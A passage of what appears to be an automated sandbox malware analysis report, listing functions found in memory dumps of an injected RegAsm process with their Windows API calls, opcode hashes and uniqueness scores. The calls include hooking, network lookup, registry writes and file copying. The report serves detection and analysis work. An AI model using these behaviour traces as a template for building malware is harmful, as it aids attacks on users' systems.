                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  • Opcode ID: f4063259004a132ed2c595b8f3f74895f817687fcb35110f2ec8213bd6aebf13
                                  • Instruction ID: f1dfff9c332c0f951c719f6193e8576c74ae28f3e5560dfaa50c4bf4d14af43d
                                  • Opcode Fuzzy Hash: f4063259004a132ed2c595b8f3f74895f817687fcb35110f2ec8213bd6aebf13
                                  • Instruction Fuzzy Hash: AA31A1715097C0AFE7138B60DC54B52BFB4EF47210F0884DAE9858F2A3C369A908CB62
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  Function 00F093ED, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction ID: f1b80b91cd7e37bc29872323b04103e3c0bd7e8d6d7d4b748be8016babe91a36
                                  • Opcode Fuzzy Hash: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction Fuzzy Hash: 5F214E74A043075ADB14AE64C9E07F72752AF567A0F94412CFCC587186DB64C847B600
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 204F1D9C, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EB4), ref: 204F1E63
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  • Opcode ID: b48d83cc5b8df8f7b7cad42e44b38390fbe26ac973970951cd0cfb9665c704f8
                                  • Instruction ID: 07c2d5e4e0a374ae32c47fe320b58a6943aa5423d35eef2bbeeb64a4325e379f
                                  • Opcode Fuzzy Hash: b48d83cc5b8df8f7b7cad42e44b38390fbe26ac973970951cd0cfb9665c704f8
                                  • Instruction Fuzzy Hash: 4F31B1B1500344AFE721DB50CC84FA6FBACEF45310F04859AFA459B192D774AA48CB61
                                  Uniqueness

                                  Uniqueness Score: 0.39%

                                  Function 1DB1AB04, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1DB1ABA5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 65b20f877a98658658b8ac0931475cf76e73a766ba9908bd228feb68ff53d235
                                  • Instruction ID: cf9919f712f4755b8a91e7bd9a29c1ec0b6f9f77e2b904680a3a89fb190b61ff
                                  • Opcode Fuzzy Hash: 65b20f877a98658658b8ac0931475cf76e73a766ba9908bd228feb68ff53d235
                                  • Instruction Fuzzy Hash: FD318BB1504380AFE722CF25DC44B67BBE8EF05620F08849AE9858B252D335E909CB71
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 204F1808, Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F18A5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  • Opcode ID: 2a1197e371d659bc757d101097b704bde29d43f4a41a1e64025856a862099b81
                                  • Instruction ID: 7f9b31f573b93771f25a0f1a3f204914a8495174e86abd62718b1262022bcd49
                                  • Opcode Fuzzy Hash: 2a1197e371d659bc757d101097b704bde29d43f4a41a1e64025856a862099b81
                                  • Instruction Fuzzy Hash: DB31D5725097846FE712CF60DC85B96BFB8EF46320F0884DAE985DB163D325A909CB71
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  Function 1DB1A779, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A834
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 790e7666de8a4c7dc8c07a177f95c8a21e6fb9a1760423fa8b71ab2444a0d115
                                  • Instruction ID: 093f94c19135e8b6bd974ae6f08fd81172156843cb772e141b9463b6deb509c5
                                  • Opcode Fuzzy Hash: 790e7666de8a4c7dc8c07a177f95c8a21e6fb9a1760423fa8b71ab2444a0d115
                                  • Instruction Fuzzy Hash: 7331AF755093846FE722CF21DC84FA3FFE8EF06610F08849AE985CB153D264E549CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 204F1104, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 204F119B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DescriptorSecurity$ConvertString
                                  • String ID:
                                  • API String ID: 3907675253-0
                                  • Opcode ID: 3ce4836539b7002a2fe906fb3d00845c3e0cbf16cdcecfc98677a57d3f5037ac
                                  • Instruction ID: 864fc36995e8eb8659b8b88f4377b4976e782cfe53304b92f76ac90b517ac08c
                                  • Opcode Fuzzy Hash: 3ce4836539b7002a2fe906fb3d00845c3e0cbf16cdcecfc98677a57d3f5037ac
                                  • Instruction Fuzzy Hash: F931C1B21043846FE712CB64DC85FA7FFB8EF46210F08849AE945DB262D724E908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.41%

                                  Function 204F048A, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 204F0531
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 787cb62086c8c4cf092e805c8489af563c3617a8e0e884c862e9c3a5bf1b107e
                                  • Instruction ID: 007ad4eab1eec6838e78044a9a627941ff301bea45af3e015928a545182b3df7
                                  • Opcode Fuzzy Hash: 787cb62086c8c4cf092e805c8489af563c3617a8e0e884c862e9c3a5bf1b107e
                                  • Instruction Fuzzy Hash: E23191B15093846FE712CB65CC84B96FFF8EF46210F08849AE984CB293D365E908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 204F0588, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowsHookExW.USER32(?,00000EB4,?,?), ref: 204F063E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 673e2e72832aaa05f5fa58a07e2c7dbef49c8923df04d08c4138063bfe7fe9e3
                                  • Instruction ID: e15de7f2f76ff714523f702c96446e6839048b965380de0a18217552cbeb4e3d
                                  • Opcode Fuzzy Hash: 673e2e72832aaa05f5fa58a07e2c7dbef49c8923df04d08c4138063bfe7fe9e3
                                  • Instruction Fuzzy Hash: 5C31B97550D3C05FD3038B259C51B62BF78EF47620F0A45DAD8848B553D265A91AC7B2
                                  Uniqueness

                                  Uniqueness Score: 0.60%

                                  Function 204F139C, Relevance: 1.6, APIs: 1, Instructions: 88fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 3180d1c83261d3bd4e801e9e1382bb458d5fb867fad448bca9389a0cc9540122
                                  • Instruction ID: 8349d33f18590ba24fc9da883f3beb9d08c6058366d58d7263f8589a5004b518
                                  • Opcode Fuzzy Hash: 3180d1c83261d3bd4e801e9e1382bb458d5fb867fad448bca9389a0cc9540122
                                  • Instruction Fuzzy Hash: AF31D3B2405784AFE712CB54DC45F96FFF8EF06320F04859AE9848B263D375A909CB61
                                  Uniqueness

                                  Uniqueness Score: 0.27%

                                  Function 204F0106, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CopyFileW.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F01A6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CopyFile
                                  • String ID:
                                  • API String ID: 1304948518-0
                                  • Opcode ID: a3db464e601f723766ca5529509fb48befa10d9077b40df8028b5604f0de2ad2
                                  • Instruction ID: 94c1d19415d9db3df3f1b661e8801bdc616f406202957da3b073b772cf7247c0
                                  • Opcode Fuzzy Hash: a3db464e601f723766ca5529509fb48befa10d9077b40df8028b5604f0de2ad2
                                  • Instruction Fuzzy Hash: 9B318C7150E3C05FD7138B748C59A56BFB4EF43210B0A84DBE885CF2A3D229A909CB32
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 204F1DBE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EB4), ref: 204F1E63
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  • Opcode ID: ee4b02a5a2055bd9cb252cd062f26ea49606cb13d02c003f64800fb7b9b0e214
                                  • Instruction ID: 233aa6294dcb99010ebff9b19ec01d4d1adeb0addf99846c0f22b8004b9cfc51
                                  • Opcode Fuzzy Hash: ee4b02a5a2055bd9cb252cd062f26ea49606cb13d02c003f64800fb7b9b0e214
                                  • Instruction Fuzzy Hash: D921D1B1500304AFF721DB54CC88FA6F7ACEF44710F10885AEE499A291DB75AA498B71
                                  Uniqueness

                                  Uniqueness Score: 0.39%

                                  Function 1DB1BED6, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileW.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BF54
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 161fc5ed7581c514e418b8e2505d1a90b96363a68652d9c32e7156c53d936989
                                  • Instruction ID: adf6160a4b05cbf4b096a79afcac7cd00776e3de9a3c0aca2aad942046285cbe
                                  • Opcode Fuzzy Hash: 161fc5ed7581c514e418b8e2505d1a90b96363a68652d9c32e7156c53d936989
                                  • Instruction Fuzzy Hash: F8316F7550E3C45FD7038B359CA5652BFB49F03224F1D84DBD889CF1A3D269A849CB62
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 204F07AB, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                  • LsaOpenPolicy.ADVAPI32(?,00000EB4), ref: 204F0843
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: OpenPolicy
                                  • String ID:
                                  • API String ID: 2030686058-0
                                  • Opcode ID: 488fba505f0672cfc9697c3cd52c3db341a7003aefc40cb150f867e0b40c001d
                                  • Instruction ID: 5457b31df467599563efe1eadf44327146737557314bc9514ac5e0c0964aa749
                                  • Opcode Fuzzy Hash: 488fba505f0672cfc9697c3cd52c3db341a7003aefc40cb150f867e0b40c001d
                                  • Instruction Fuzzy Hash: 892194B15053846FE721DF64DC84FA6FFB8EF46610F08849AE985DB152D364A908CB61
                                  Uniqueness

                                  Uniqueness Score: 2.12%

                                  Function 1DB1AA34, Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB1AADA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 829667967c482d7b3e290053db98527feeb33086f7e5c479f088364eecf9364d
                                  • Instruction ID: db205963df738bcb65dd37b01d34ef4f347c83feab70d37610633ef95970b118
                                  • Opcode Fuzzy Hash: 829667967c482d7b3e290053db98527feeb33086f7e5c479f088364eecf9364d
                                  • Instruction Fuzzy Hash: 2F21B5755093C06FD3138B25CC51B62BFB8EF87610F0D85CBE9848B663D225A91AC7B6
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 204F2818, Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FormatMessageW.KERNEL32(?,00000EB4,?,?), ref: 204F28BA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FormatMessage
                                  • String ID:
                                  • API String ID: 1306739567-0
                                  • Opcode ID: 29465fcc2bdaef85341817bd95d83d5e128aa6c605e488ef54f0618853c8fcf0
                                  • Instruction ID: 03628755abf4fbdb43ba7a5050aab5a027382df406ab8b30fb08cd21b72b72d2
                                  • Opcode Fuzzy Hash: 29465fcc2bdaef85341817bd95d83d5e128aa6c605e488ef54f0618853c8fcf0
                                  • Instruction Fuzzy Hash: C321B57190D3C45FD302CB658C51B66BFB4EF87610F0980CBD9848F2A3D624A919C7B2
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 204F1912, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F199C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID:
                                  • API String ID: 4114910276-0
                                  • Opcode ID: a0ac6d6c0ec865a5176b9809c8f4f0eed847a1c7c9af7da8bbed29b126d58835
                                  • Instruction ID: 23465440e54e5e6cc763f18f4fabd3c91088519cce3879c27eea1d0f6bf89c85
                                  • Opcode Fuzzy Hash: a0ac6d6c0ec865a5176b9809c8f4f0eed847a1c7c9af7da8bbed29b126d58835
                                  • Instruction Fuzzy Hash: D321B2B21053846FE722CF61DC85FA7FBACEF45210F04849AE945DB152D364EA48CBB1
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  Function 204F12BA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 204F1345
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  • Opcode ID: 78f4431de3e76463db790a9a6aa99104d398875d853432b2d34b51dfbbb023b2
                                  • Instruction ID: 1d5f9fafddfa50bb3a8ad5019d549da4733eb2b1083733f6aa53400be6badfa9
                                  • Opcode Fuzzy Hash: 78f4431de3e76463db790a9a6aa99104d398875d853432b2d34b51dfbbb023b2
                                  • Instruction Fuzzy Hash: 7B21A1B1505384AFE711CB65CC45F66FFA8EF05220F0884AEED848B292D375E948CB61
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  Function 1DB1AB26, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1DB1ABA5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 3249c5650fa98e326a8bcb6939650275629acb44c2626de43d3a070197263b70
                                  • Instruction ID: 3cf16e662a5dff0eb63a7fc44c638bfdb274d6e308fe5a0535bee7551897fe0e
                                  • Opcode Fuzzy Hash: 3249c5650fa98e326a8bcb6939650275629acb44c2626de43d3a070197263b70
                                  • Instruction Fuzzy Hash: 1B21BDB1600280AFE722DF25DC84F67FBE8EF08620F048569E9498B252D735F509CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 204F1012, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F10B0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: adb2f7af1ff99fecb4a9e62cf9fd1b6448356bd994e4d4d96d2d684051293c81
                                  • Instruction ID: 82404a931d0c29a5ee2ebf105e4d042c48b733adf824e0170d83cbb5a94fb72f
                                  • Opcode Fuzzy Hash: adb2f7af1ff99fecb4a9e62cf9fd1b6448356bd994e4d4d96d2d684051293c81
                                  • Instruction Fuzzy Hash: 4D21A172504384AFE721CF51CC84FA7FFB8EF45210F08859AE9859B2A2D725E948CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 204F112A, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 204F119B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DescriptorSecurity$ConvertString
                                  • String ID:
                                  • API String ID: 3907675253-0
                                  • Opcode ID: efbfb4249e74c1cfe070af3d525ba72c60c59f150b700815517d73504c244bc9
                                  • Instruction ID: 2a24ee1ad5ae52a281be9319d53433619dc3424ffab6aacb0cb8ffdc42790420
                                  • Opcode Fuzzy Hash: efbfb4249e74c1cfe070af3d525ba72c60c59f150b700815517d73504c244bc9
                                  • Instruction Fuzzy Hash: BD2104B1600244AFF720DF68DC84FAAFBACEF45210F14C45AED45DB252D634E905CA71
                                  Uniqueness

                                  Uniqueness Score: 0.41%

                                  Function 1DB1AD78, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteFile.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AE09
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: ad9532f8338950e6f9f6994c53f5e66efa024abfed2cb56b1628dd4b0caeb105
                                  • Instruction ID: e481c9134d18bd2c0c306ff4434808205a958978f5a100b6c52721674cb6e502
                                  • Opcode Fuzzy Hash: ad9532f8338950e6f9f6994c53f5e66efa024abfed2cb56b1628dd4b0caeb105
                                  • Instruction Fuzzy Hash: 052192725093806FD722CF21DC84FA6FFB8EF46214F08849AE9459F153C225A909CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1A95A, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegSetValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A9EC
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: a4b02ba4d32d351efdffd38d11e8e81176da08ab0fd800f217f07678742d874e
                                  • Instruction ID: 652e10ceea0d143a94635eb8e29995c3058c3918c578176f0dbd9dec20aaed1e
                                  • Opcode Fuzzy Hash: a4b02ba4d32d351efdffd38d11e8e81176da08ab0fd800f217f07678742d874e
                                  • Instruction Fuzzy Hash: 3D2190B21047806FE721CF11DC84FA7FFE8EF45610F04849AE9469B252D264E949CB71
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  Function 00F02B4A, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00F02F78
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction ID: cbde9b2b9c54b2cad6c56e7accc0ea2007323af2c01b5717a54b52c8eb6c69e9
                                  • Opcode Fuzzy Hash: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction Fuzzy Hash: C31126B1740301AFEB201E688D89FEA3365DF05764FE00252FE129B1D1D7A4D8C2AA25
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  Function 1DB1A6B2, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB1A731
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: e297648b60a11dd998a31c3fa1cb3279dec064ad08b5a50305871972c7b47807
                                  • Instruction ID: a8d44dac9e078b9792fe721af5ed16fc960333e20c741ca15c4620d0ef1d382c
                                  • Opcode Fuzzy Hash: e297648b60a11dd998a31c3fa1cb3279dec064ad08b5a50305871972c7b47807
                                  • Instruction Fuzzy Hash: 1F21CDB2500204AFF721DF54DC84FABFBECEF45620F04855AE9469B252D634E6098AB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1B81F, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1DB1B8BF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 4a52d2f73c695358817bb264a9f20f5e36c56878ed46ff34c32b86962c6b4c38
                                  • Instruction ID: 1db79b76f8e18fcc0fea5b38c4beea7f35023c402ee5f6f90755b40c700cdb0c
                                  • Opcode Fuzzy Hash: 4a52d2f73c695358817bb264a9f20f5e36c56878ed46ff34c32b86962c6b4c38
                                  • Instruction Fuzzy Hash: A721DA715453C46FE712CB11DC85BA2FFA8DF42720F0880DAE9859F193D268AA49CB76
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 204F204D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 204F20CA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: KernelObjectSecurity
                                  • String ID:
                                  • API String ID: 3015937269-0
                                  • Opcode ID: 28082c1627735fbf43f471e295606332aee3c9c1021df18786521b2605b66d97
                                  • Instruction ID: 1caf90e5a7663f5bd3db2ddcfd3ef5979c3a1fc05d93ef6b11e1e5c13ea8f1df
                                  • Opcode Fuzzy Hash: 28082c1627735fbf43f471e295606332aee3c9c1021df18786521b2605b66d97
                                  • Instruction Fuzzy Hash: EE21A1755093C45FD712CB24DC54B92BFA4EF47214F0984DAEE848F253D6359908CB71
                                  Uniqueness

                                  Uniqueness Score: 1.51%

                                  Function 1DB1ACB7, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileType.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AD3D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
